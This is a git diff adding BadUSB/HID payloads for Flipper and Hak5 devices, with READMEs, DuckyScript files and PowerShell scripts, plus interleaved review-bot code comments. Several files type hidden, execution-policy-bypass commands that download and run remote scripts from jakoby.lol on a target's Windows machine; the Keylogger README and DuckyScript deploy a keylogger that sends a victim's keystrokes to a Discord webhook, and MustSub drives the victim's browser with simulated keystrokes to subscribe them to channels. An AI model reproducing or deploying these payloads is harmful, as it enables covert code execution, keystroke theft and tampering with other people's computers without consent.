  11. Acknowledgments
  12. +
+
+ +# JumpScare + +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. + +## Description + +This script starts off using Invoke-WebRequests to download both an Image and Sound file. +Their system volume is then turned up to the max level. +The script will be paused until a mouse movement is detected. +At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played. + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +Arf + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) +* [0iphor13](https://github.com/0iphor13) +* [PhilSutter](https://github.com/PhilSutter) + + +

(back to top)

diff --git a/Payloads/JumpScare/female_scream.wav b/Payloads/JumpScare/female_scream.wav new file mode 100644 index 0000000..67fce05 Binary files /dev/null and b/Payloads/JumpScare/female_scream.wav differ diff --git a/Payloads/JumpScare/jumpscare.png b/Payloads/JumpScare/jumpscare.png new file mode 100644 index 0000000..36c4cdb Binary files /dev/null and b/Payloads/JumpScare/jumpscare.png differ diff --git a/Payloads/Keylogger/README.md b/Payloads/Keylogger/README.md new file mode 100644 index 0000000..0b51049 --- /dev/null +++ b/Payloads/Keylogger/README.md @@ -0,0 +1,141 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Keylogger + +This is a Powershell based keylogger that exfiltrates the logs to discord + +## Description + +Quickly with just ONE line of code you can deploy a keylogger on your targets computer + +Complete with custom logging times, and self destruct feature + +Just move the `keylogger.txt` file over to your flipper and you are good to go + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* 15 seconds later you have their keystrokes being sent to you + +This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you + +* `$dc=''` is the variable where you plug in your discord webhook + +``` +powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" | iex +``` +### ADDITIONAL PARAMETERS + +The payload is set to send the logs collected every hour on the hour + +* You maybe use the `$log` variable to specify a certain time instead (Use this for testing) +* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm + +You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th + +Calling the script with both a `log` time and `killswitch` will look something like this: + +``` +powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex" +``` +### DELETING THE KEYLOGGER + +Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up + +C# + + + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ diff --git a/Payloads/Keylogger/keylogger.ps1 b/Payloads/Keylogger/keylogger.ps1 new file mode 100644 index 0000000..9669f06 --- /dev/null +++ b/Payloads/Keylogger/keylogger.ps1 @@ -0,0 +1 @@ +$done = New-Object -ComObject Wscript.Shell;$done.Popup("This payload has been detected by Microsoft. An updated undetected version will be released as soon as possible",10) diff --git a/Payloads/Keylogger/keylogger.txt b/Payloads/Keylogger/keylogger.txt new file mode 100644 index 0000000..a5fa34a --- /dev/null +++ b/Payloads/Keylogger/keylogger.txt @@ -0,0 +1,25 @@ +REM Title: Keylogger + +REM Author: I am Jakoby + +REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord + +REM Target: Windows 10, 11 + +REM ADDITIONAL PARAMETERS +REM The payload is set to send the logs collected every hour on the hour + +REM You maybe use the $log variable to specify a certain time instead (Use this for testing) +REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm +REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th + +REM Calling the script with both a log time and killswitch will look something like this: + +REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex" +ENTER diff --git a/Payloads/MustSub/MustSub-Execute.txt b/Payloads/MustSub/MustSub-Execute.txt new file mode 100644 index 0000000..b7d7325 --- /dev/null +++ b/Payloads/MustSub/MustSub-Execute.txt 
@@ -0,0 +1,11 @@
+REM Title: MustSub
+REM Author: I am Jakoby
+REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels
+REM Target: Windows 10, 11
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex
+ENTER
diff --git a/Payloads/MustSub/MustSub.ps1 b/Payloads/MustSub/MustSub.ps1
new file mode 100644
index 0000000..a027b56
--- /dev/null
+++ b/Payloads/MustSub/MustSub.ps1
@@ -0,0 +1,40 @@
+$channels = @"
+https://www.youtube.com/iamjakoby
+https://www.youtube.com/c/CosmodiumCS
+https://www.youtube.com/c/zSecurity
+https://www.youtube.com/c/SystemExploited/featured
+https://www.youtube.com/c/Lab401
+https://www.youtube.com/c/TheCyberMentor
+https://www.youtube.com/c/JohnHammond010
+https://www.youtube.com/c/MalwareTechBlog
+https://www.youtube.com/c/SecurityFWD
+https://www.youtube.com/c/Nahamsec
+https://www.youtube.com/c/jhaddix
+https://www.youtube.com/c/NetworkChuck
+https://www.youtube.com/c/DavidBombal
+https://www.youtube.com/c/JimBrowning
+https://www.youtube.com/user/TechInterpreterInc
+"@
+
+$URLs = $channels -split "`n"
+
+function subscribe {
+
+[CmdletBinding()]
+param (
+[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]
+[string]$channel
+)
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$url = -join($channel,"?sub_confirmation=1")
+Start-Process $url
+Start-Sleep -Seconds 3
+[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
+[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
+Start-Sleep -Seconds 1
+[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
+Start-Sleep -Seconds 1
+}
+
+foreach ($channel in $URLs) {subscribe $channel}
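Review bot: In `subscribe`, `$o=New-Object -ComObject WScript.Shell` is assigned and never used (every keystroke goes through `[System.Windows.Forms.SendKeys]::SendWait`), and `Add-Type -AssemblyName System.Windows.Forms` is repeated on each of the 15 calls; delete the `$o` line and move the `Add-Type` above the function. The `param` block declares `ValueFromPipeline = $True` but the function has no `process {}` block, so piping several URLs into `subscribe` would act on the last one only; the `foreach` at the bottom sidesteps that, but either remove `ValueFromPipeline` or wrap the body in `process { ... }` so the signature matches what the function does.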
diff --git a/Payloads/MustSub/Readme.md b/Payloads/MustSub/Readme.md new file mode 100644 index 0000000..9e7720f --- /dev/null +++ b/Payloads/MustSub/Readme.md @@ -0,0 +1,121 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Must Sub + +A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels. + +## Description + +This script will loop through an array of URLs. + +Each URL will be passed through the subscribe function. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+ + Jsonnet + +
TikTok +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/Payloads/PS-Draw/Images/PS-Draw.jpg b/Payloads/PS-Draw/Images/PS-Draw.jpg new file mode 100644 index 0000000..78f7d5f Binary files /dev/null and b/Payloads/PS-Draw/Images/PS-Draw.jpg differ diff --git a/Payloads/PS-Draw/Images/images b/Payloads/PS-Draw/Images/images new file mode 100644 index 0000000..b66011e --- /dev/null +++ b/Payloads/PS-Draw/Images/images @@ -0,0 +1 @@ +images will be stored here diff --git a/Payloads/PS-Draw/Images/omg-ico.png b/Payloads/PS-Draw/Images/omg-ico.png new file mode 100644 index 0000000..d967bba Binary files /dev/null and b/Payloads/PS-Draw/Images/omg-ico.png differ diff --git a/Payloads/PS-Draw/Images/ps-colors.jpg b/Payloads/PS-Draw/Images/ps-colors.jpg new file mode 100644 index 0000000..f865281 Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-colors.jpg differ diff --git a/Payloads/PS-Draw/Images/ps-hak5.jpg b/Payloads/PS-Draw/Images/ps-hak5.jpg new file mode 100644 index 0000000..30b6644 Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-hak5.jpg differ diff --git a/Payloads/PS-Draw/Images/ps-omg.jpg b/Payloads/PS-Draw/Images/ps-omg.jpg new file mode 100644 index 0000000..cef9357 Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-omg.jpg differ diff --git a/Payloads/PS-Draw/PS-Custom-Draw.ps1 b/Payloads/PS-Draw/PS-Custom-Draw.ps1 new file mode 100644 index 0000000..73c22bc --- /dev/null +++ b/Payloads/PS-Draw/PS-Custom-Draw.ps1 
@@ -0,0 +1,232 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose. + To increase the size of the pixels add more spaces to the following Write-Host command. + Write-Host " " -NoNewline -BackgroundColor $Colors[$position] + +.DESCRIPTION + This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window. 
+ +.SYNTAX + $col | PS-Draw + $hak5 | PS-Draw + $omg | PS-Draw + PS-Draw -Image $col + PS-Draw -Image $hak5 + PS-Draw -Image $omg +#> +############################################################################################################################################################ + +$Colors = @{ + 1 = 'White' + 2 = 'Black' + 3 = 'DarkBlue' + 4 = 'DarkGreen' + 5 = 'DarkCyan' + 6 = 'DarkRed' + 7 = 'DarkMagenta' + 8 = 'DarkYellow' + 9 = 'Gray' + 10 = 'DarkGray' + 11 = 'Blue' + 12 = 'Green' + 13 = 'Cyan' + 14 = 'Red' + 15 = 'Magenta' + 16 = 'Yellow' +} + + #Show available colors +$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2), + @(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3), + @(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4), + @(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5), + @(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6), + @(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7), + @(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8), + @(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9), + @(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10), + @(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11), + @(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12), + @(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13), + @(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14), + @(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15), + @(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16) + + +$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1), + @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2), + @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2), + @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2), + @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2), + @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2), + @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2), + @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1), + 
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1), + @(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1), + @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2), + @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2), + @(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2), + @(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2), + @(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2), + @(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2) + + +$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1), + @(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1), + @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1), + 
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1), + @(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1), + @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1) + +# ------------------------------------------------------------------------------------------- + + +function PS-Draw { + [CmdletBinding()] + param ( + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("I")] + [object[]]$Image + ) + + # if the data is sent through the pipeline, use $input to collect is as array + if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) } + #$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" } + + cls + + foreach ($row in $Image) { + foreach ($position in $row) { + Write-Host " " -NoNewline -BackgroundColor $Colors[$position] + Start-Sleep -m 10 + } + Write-Host "" + } +} + +<# + +.NOTES + This will get either the targets full name associated with the registered microsoft account + or it will default to grabbing the username of the account to use as a greeting for this script +#> + + function Get-fullName { + + try { + + $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") + + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch 
{Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +# ------------------------------------------------------------------------------------------- + +# Get name to be used in greeting + +cls + +$fullName = Get-fullName + +echo "Hello $fullName" + +# ------------------------------------------------------------------------------------------- + +<# + +.NOTES + Then the script will be paused until the mouse is moved + script will check mouse position every indicated number of seconds + This while loop will constantly check if the mouse has been moved + "CAPSLOCK" will be continuously pressed to prevent screen from turning off + it will then sleep for the indicated number of seconds and check again + when mouse is moved it will break out of the loop and continue the script +#> + + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$originalPOS = [System.Windows.Forms.Cursor]::Position.X + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } + +<# + +.NOTES + This is where you call the function to draw out one of the images above + $col - to see the available colors you can use for a custom image + $hak5 - this will draw out the hak5 five logo + $omg - this will draw out the omg logo +#> + +# ------------------------------------------------------------------------------------------- + +# Call function with one of the arrays listed above to generate an image + +$hak5 | PS-Draw + + diff --git a/Payloads/PS-Draw/PS-Draw.ps1 b/Payloads/PS-Draw/PS-Draw.ps1 new file mode 100644 index 0000000..babc366 --- /dev/null +++ b/Payloads/PS-Draw/PS-Draw.ps1 
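Review bot: In `Get-fullName`, `("$fullName").TrimStart("Full Name")` does not strip the prefix `Full Name`: `TrimStart` takes a set of characters, so it also removes any leading `F`, `u`, `l`, `N`, `a`, `m`, `e` or space from the name itself (a user whose full name is `Nancy Drew` would be greeted as `Hello ncy Drew`). Use `$fullName = ("$fullName") -replace '^Full Name\s*',''` instead. The `catch` block also carries `-ErrorAction SilentlyContinue` on a line of its own after `return $env:UserName`; it is unreachable and attached to no cmdlet, and depending on the PowerShell version it may be a parse error that stops the whole file from loading, so delete it (if the intent was to silence `net user`, put the option on the `Net User` call inside the `try`).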
@@ -0,0 +1,201 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# tiktok.com/@i_am_jakoby # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.NOTES + This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works + well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My example image is 25x20 pixels + To increase the size of the pixels add more spaces to the following Write-Host command. 
+ Write-Host " " -NoNewline -BackgroundColor $BackGround + +.DESCRIPTION + This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color + that can be used in powershell. Finally that image will be drawn in a powershell window. + +.SYNTAX + "$env:TMP\omg-ico.png" | PS-Draw + PS-Draw -Path "$env:TMP\omg-ico.png" +#> +############################################################################################################################################################ + +Function PS-Draw +{ + param( + [String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path, + [Switch] $ToASCII + ) + Begin + { + [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing') + + # Console Colors and their Hexadecimal values + $Colors = @{ + 'FFFFFFFF' = 'White' + 'FF000000' = 'Black' + 'FF000080' = 'DarkBlue' + 'FF008000' = 'DarkGreen' + 'FF008080' = 'DarkCyan' + 'FF800000' = 'DarkRed' + 'FF800080' = 'DarkMagenta' + 'FF808000' = 'DarkYellow' + 'FFC0C0C0' = 'Gray' + 'FF808080' = 'DarkGray' + 'FF0000FF' = 'Blue' + 'FF00FF00' = 'Green' + 'FF00FFFF' = 'Cyan' + 'FFFF0000' = 'Red' + 'FFFF00FF' = 'Magenta' + 'FFFFFF00' = 'Yellow' + + } + + # Algorithm to calculate closest Console color (Only 16) to a color of Pixel + Function Get-ClosestConsoleColor($PixelColor) + { + ($(foreach ($item in $Colors.Keys) { + [pscustomobject]@{ + 'Color' = $Item + 'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16)) + } + }) | Sort-Object Diff)[0].color + } + } + Process + { + Foreach($item in $Path) + { + #Convert Image to BitMap + $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname) + + Foreach($y in (1..($BitMap.Height-1))) + { + Foreach($x in (1..($BitMap.Width-1))) + { + $Pixel = $BitMap.GetPixel($X,$Y) + $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name)) + + + If($ToASCII) # Condition to check ToASCII switch + { + 
Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround + } + else + { + Write-Host " " -NoNewline -BackgroundColor $BackGround + } + } + Write-Host '' # Blank write-host to Start the next row + } + } + + } + end + { + + } + +} + +<# + +.NOTES + This will get either the targets full name associated with the registered microsoft account + or it will default to grabbing the username of the account to use as a greeting for this script +#> + + function Get-fullName { + + try { + + $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") + + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +# ------------------------------------------------------------------------------------------- +# Download the image from wherever you are hosting it + +iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png + +# ------------------------------------------------------------------------------------------- + +# Get name to use in the greeting + +cls + +$fullName = Get-fullName + +echo "Hello $fullName" +# ------------------------------------------------------------------------------------------- + +<# + +.NOTES + Then the script will be paused until the mouse is moved + script will check mouse position every indicated number of seconds + This while loop will constantly check if the mouse has been moved + "CAPSLOCK" will be continuously pressed to prevent screen from turning off + it will then sleep for the indicated number of seconds and check again + when mouse is moved it will break out of the loop and continue the script +#> + + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$originalPOS = 
